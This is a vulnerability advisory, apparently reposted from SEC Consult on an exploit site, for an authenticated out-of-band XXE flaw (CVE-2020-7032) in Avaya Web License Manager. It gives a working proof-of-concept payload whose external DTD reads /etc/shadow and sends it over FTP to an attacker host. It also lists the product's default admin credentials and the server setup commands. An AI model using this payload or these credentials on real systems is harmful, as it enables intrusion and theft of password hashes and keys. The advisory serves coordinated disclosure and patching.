Author

Koplin

Risk

[

Security Risk Low

]

0day-ID

0day-ID-35270

Category

web applications

Date add

18-11-2020

CVE

CVE-2020-7032

Platform

php

=======================================================================
              title: Blind Out-Of-Band XML External Entity Injection (Authenticated)
            product: Avaya Web License Manager
 vulnerable version: 6.x, 7.0 through 7.1.3.6, 8.0 through 8.1.2.0.0
      fixed version: 7.1.3.7 and 8.1.3
         CVE number: CVE-2020-7032
             impact: medium (6.5)
           homepage: https://www.avaya.com/en/
              found: 03/2020
                 by: M. Koplin (Office Munich)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"As a global leader in delivering superior communications experiences,
Avaya provides the most complete portfolio of software and services
for multi-touch contact center and unified communications offered on
premises, in the cloud, or a hybrid. Today's digital world centers on
communications enablement, and no other company is better positioned
to do this than Avaya."

Source: https://www.avaya.com/en/


Business recommendation:
------------------------
The vendor provides a patch for the Avaya Web License Manager which
should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
This vulnerability within the Avaya Web License Manager (WebLM) allows an
authenticated user to read arbitrary files in the context of the Webserver
(Tomcat) by uploading a specially crafted XML file within the License upload
functionality. Accessible sensitive files that can be read are for example
/etc/shadow, SSH keys or other configuration files.


Proof of concept:
-----------------
1) Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
Login as a user to https://$IP/WebLM/ and navigate to "Install License". If
WebLM has never been used before or not hardened, the default credentials are
admin:weblmadmin

Create an XML file like the following:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

and a DTD file like:

<!ENTITY % d SYSTEM "file:///etc/shadow">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">

Start a webserver, e.g. SimpleHTTPServer

python -m SimpleHTTPServer 80

and an FTP server like GO XXE FTP Server

./xxeserv 2121

Upload the crafted XML file by clicking the install button.


Vulnerable / tested versions:
-----------------------------
The following version has been tested:
* Avaya Web License Manager 6.3

The vendor doesn't support versions < 7.x. Probably all versions <7 are
affected.


Vendor contact timeline:
------------------------
2020-03-18: Contacting vendor through securityalerts@avaya.com
2020-03-19: Vendor replied and started the process to verify the vulnerability
2020-04-03: Second mail to vendor to check if they have verified the issue
2020-05-18: Release of Hotfix for WebLM (embedded with SMGR) version 8.1.2.x
2020-07-01: Advisory release postponed, due to a delayed patch for version 7
2020-11-16: Patch release for version 7 and 8 of WebLM standalone and SMGR
2020-11-17: Publication of the advisory.


Solution:
---------
Version 6: Upgrade to a new major release
Version 7: Upgrade to 7.1.3.7 or later
Version 8: Install hot fix #7 or upgrade to version 8.1.3


#  0day.today [2024-11-05]  #